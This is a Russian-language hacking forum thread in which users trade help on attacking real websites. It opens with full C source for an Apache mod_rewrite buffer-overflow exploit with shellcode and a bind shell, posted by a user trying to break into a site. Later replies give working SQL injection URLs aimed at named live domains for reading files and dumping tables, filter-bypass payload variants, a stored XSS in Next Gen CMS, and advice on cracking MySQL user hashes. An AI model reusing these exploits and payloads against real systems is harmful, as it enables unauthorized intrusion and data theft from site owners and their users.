Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FeaRMysLF

    FeaRMysLF New Member

    Joined:
    19 Jan 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Я нашел багу на сайте Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability, скомпилировал эксплойт, запускаю, но не удается подключиться к шелу:


    Code:
    ./exploit ipсайта test
    Exploit: apache mod rewrite exploit (win32)
           By: fabio/b0x (oc-192, old CoTS member)
    Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard
    
    [+]Preparing payload
    [+]Connecting...
    [+]Connected
    [+]Sending...
    [+]Sent
    [+]Starting second stage...
    [+]Connecting...
    [-]Unable to connect
    Код эксплойта:
    Code:
    /*
    apache mod rewrite exploit (win32)
    
    By: fabio/b0x (oc-192, old CoTS member)
    
    Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
    
    Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
          original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
          was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/
    
    Usage: ./apache hostname rewrite_path
    
    Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard
    
    Example: ./apache 192.168.0.253 test
    [+]Preparing payload
    [+]Connecting...
    [+]Connected
    [+]Sending...
    [+]Sent
    [+]Starting second stage...
    [+]Connecting...
    [+]Connected
    [+]Sending...
    [+]Sent
    [+]Connecting to shell
    Microsoft Windows [Version 5.2.3790]
    (C) Copyright 1985-2003 Microsoft Corp.
    
    C:\Program Files\Apache Group\Apache2>exit
    exit
    [+]Owned
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    
    #define PORT 80 
    #define PORT2 4444
    #define MAXDATASIZE 1024
    char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
    char shellcode[]= 
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
    "\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
    "\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
    "\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
    "\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
    "\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
    "\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
    "\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
    "\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
    "\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
    "\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
    "\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
    "\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
    "\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
    "\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
    "\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
    "\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
    "\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
    "\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
    "\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
    "\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
    "\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
    "\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
    "\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
    "\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
    "\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
    "\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
    "\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
    "\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
    "\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
    "\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
    "\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
    "\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
    "\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
    "\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
    "\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
    "\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
    "\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
    "\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
    "\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
    
    
    char finish[]= "HTTP/1.0\r\nHost: ";
    
    char payload2[]=
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
    "\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
    "\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
    "\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
    "\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
    "\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
    "\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
    "\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
    "\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
    "\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
    "\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
    "\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
    "\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
    "\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
    "\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
    "\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
    "\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
    "\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
    "\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
    "\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
    "\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
    "\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";
    
    int main(int argc, char *argv[])
    {
        int sockfd, numbytes;  
        char buf[MAXDATASIZE];
        struct hostent *he;
        struct sockaddr_in their_addr;
        printf("  Exploit: apache mod rewrite exploit (win32)\n"
               "       By: fabio/b0x (oc-192, old CoTS member)\n"
               "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
               );
        if (argc != 3) {
            printf("    Usage: ./apache hostname rewrite_path\n");
            exit(1);
        }
        printf("\n[+]Preparing payload\n");
    
        char payload[748];
        sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);
    
        printf("[+]Connecting...\n");
        if ((he=gethostbyname(argv[1])) == NULL) {
            printf("[-]Cannot resolv hostname...\n");
            exit(1);
        }
        if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
            printf("[-]Socket error...\n");
            exit(1);
        }
    
        their_addr.sin_family = AF_INET;   
        their_addr.sin_port = htons(PORT);  
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
        if (connect(sockfd, (struct sockaddr *)&their_addr,
                                              sizeof(struct sockaddr)) == -1) {
            printf("[-]Unable to connect\n");
            exit(1);
        }
       printf("[+]Connected\n[+]Sending...\n");
       if (send(sockfd, payload, strlen(payload), 0) == -1){
        printf("[-]Unable to send\n");
        exit(1);
       }
       printf("[+]Sent\n");
       close(sockfd);
       printf("[+]Starting second stage...\n");
       sleep(3);
        printf("[+]Connecting...\n");
        if ((he=gethostbyname(argv[1])) == NULL) { 
            printf("[-]Cannot resolv hostname...\n");
            exit(1);
        }
        if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
            printf("[-]Socket error...\n");
            exit(1);
        }
    
        their_addr.sin_family = AF_INET;   
        their_addr.sin_port = htons(PORT2);
        their_addr.sin_addr = *((struct in_addr *)he->h_addr);
        memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
        if (connect(sockfd, (struct sockaddr *)&their_addr,
                                              sizeof(struct sockaddr)) == -1) {
            printf("[-]Unable to connect\n");
            exit(1);
        }
       printf("[+]Connected\n[+]Sending...\n");
       if (send(sockfd, payload2, strlen(payload2), 0) == -1){
        printf("[-]Unable to send\n");
        exit(1);
       }
       printf("[+]Sent\n[+]Connecting to shell\n");
       close(sockfd);
    
    
       sleep(3);
       int exec;
       char what[1024];
       sprintf(what," nc -w 10 %s 4445",argv[1]);
       exec=system(what);
       if (exec!=0){
        printf("[-]Not hacked\n");
       } else {
        printf("[+]Owned\n");
       }
       exit(1);
    } 
    
    очень прошу ответы в личку, спасибо большое заранее
     
  2. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Попробуй поменять порт, может фаер не пускает коннект...
     
  3. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Есть базы:
    Основная(там де все аки)
    information_schema
    mysql

    Проблема в том что взлом идет sql injection building как бы по 1 букве 10к акаунтов неохотно перебирать. Так вот вопрос:
    Можно ли через те базы:
    information_schema
    mysql

    вывести инфу о удалённом подключение? Или какую то другую, что б облегчить взлом...
    Спасибо огромное...
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ~{OmRus}~
    Да, но большое кол-во условий:
    - Есть доступ на чтение mysql.user
    - Сбрутишь хэш пассворда
    - В host у данного юзера будут разрешены подключения с любого IP
    - На сервере открыт 3306порт удаленно
    - БД на этом же сервере

    SELECT user,password,host FROM mysql.user

    Вероятность крайне мала.

    Как я понял, вся проблема в том, что у тебя Blind SQLi.
    https://forum.antichat.ru/thread119047.html
    Методы с find_in_set вполне ускоряют дамп.
     
    2 people like this.
  5. 0ldbi4

    0ldbi4 Elder - Старейшина

    Joined:
    14 Apr 2008
    Messages:
    264
    Likes Received:
    51
    Reputations:
    10
    Подскажите:

    сайт ругается на попытку инъекции "AND+1=2+union+select+1,2+--+1" вещами вроде "5ade" в начале страницы.

    Что это значит? На разные запросы разные 4 символьные "коды".
     
  6. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    помогите мне м такой проблемой,нашел sql-inj выводит ошибку
    HS+ design is temporarily unavailable
    The following errors has been found:
    HS+ system error: MYSQL error:1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3 (# 256).
    The following will be reported to the Administrator:
    Error in line 7 of file /var/www/html/PHPscripts/error_inc.php
    Я так понимаю /var/www/ это полный путь к сайту.Составляю запрос на вывод файла /var/www/index.html мне выдает ошибку.А при выводе файла /etc/passwd всё нормально выводится,может я неправильно нашел полный путь до корня?
     
  7. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Полный путь /var/www/html/.

    Держи:
    PHP:
    http://www.hsplusdesign.be/itemviewer.php?id=-113+union+select+1,2,3,load_file%280x2f7661722f7777772f68746d6c2f696e6465782e68746d6c%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    :)
     
  8. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Спасибо,а как ты понял что это полный путь к корню?
     
  9. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Немного перефразирую, чтобы было понятнее - /var/www/html/ - полный путь до конкретно интересующего тебя файла, про который ты спросил а именно index.html

    А так, да, корень сайта находится по /var/www/.

    Как понял? Ну, очевидно же, что если index.html не лежит в /var/www/, то единственным местом, где он может находится будет /var/www/html/
     
  10. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    таки никак? раз идет проверка на то, какое значение ввожу, да?
     
  11. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    Нашел уязвимость на сайте, а там хостинг от sweb. Кто не знает, там есть фильтрация, некая защита от хакеров.

    Дело в том, что там фильтруется FROM. Как мне поступить в данной ситуации?
     
  12. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Там фильтруется не только `FROM`. У них реализуется на уровне веб-сервера или демона эта шляпа. Очень жесткий фильтр. Ищи места в коде сайта, где данные транскодируются, передаются нестандартными GPC массивами или прямые аплоады и прочие финты ушами. Прямая скуль весьма сомнительно что-что тут тебе даст.
     
  13. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    52
    Likes Received:
    5
    Reputations:
    -4
    http://www.xakep.ru/howto/53202/Kak-obojti-zacshity-Sweb-i-Peterhost-hostingov.htm

    Нашел статью, но походу они начали и POST фильтровать...

    ------------
    Кто какие знает уязвимости в Next Gen CMS?
     
    #20093 kise, 13 Apr 2012
    Last edited: 13 Apr 2012
  14. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Продукт: Next Gen CMS
    Версия: 0.9.3 Release [SVN880+FIX01] (Последняя на данный момент)

    Уязвимость: XSS Активные
    При добавлении новости
    Уязвимы поля: "Заголовок", 'тестовый блог
    Code:
    <script>alert(/xss/)</script>
    Требуются права модератора или администратора

    () mix0x0
     
    #20094 mix0x0, 13 Apr 2012
    Last edited: 13 Apr 2012
    1 person likes this.
  15. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Фильтр при запросе union select.Можно ли как то обойти?
     
    _________________________
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос

    PHP:
    http://good-life.kz/ru/cat.php?id=5'+and(select+1+from(select+count(*),concat((select+substr(concat_ws(0x3a,table_schema,table_name,table_rows),1,90)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+0,1),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+
    какова он мне выдаёт что возвращается больше одного результата ответа? как исправить?
     
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+[B][COLOR=DarkRed]1[/COLOR][/B],1),64),rand(0)|0)+having+avg(0)+or'
    
    http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+[B][COLOR=DarkRed]2[/COLOR][/B],1),64),rand(0)|0)+having+avg(0)+or'
    
    http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+[B][COLOR=DarkRed]3[/COLOR][/B],1),64),rand(0)|0)+having+avg(0)+or'
    
    http://good-life.kz/ru/cat.php?id=5'or+1+group+by+concat(left((select+distinct+table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61+limit+[B][COLOR=DarkRed]4[/COLOR][/B],1),64),rand(0)|0)+having+avg(0)+or'
    
     
    1 person likes this.
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Можно.
    1. Запостить сюда ссылку.
    2. Заглулить самому WAF Bypass (Есть презентация от Евтеева на этот счет).

    Для начало надо определить, что именно фильтруеться.
    Просто UNION
    Просто SELECT
    Связка UNION SELECT
    Ну и т.д...

    А потом уже действовать.

    UNION(SELECT(1),2,version(),(4))
    UNION+/*!SELECT*/+1,2,version(),4
    /*!UNION+SELECT*/+1,2,version(),4
    Попробовать передать данные через POST
    Регистр
    Вместо пробелов(+) использовать другие символы
    И т.д...
     
    1 person likes this.
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
     
    _________________________
    #20099 kingbeef, 14 Apr 2012
    Last edited: 14 Apr 2012
  20. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    не могу найти куда выводит =/
     
Thread Status:
Not open for further replies.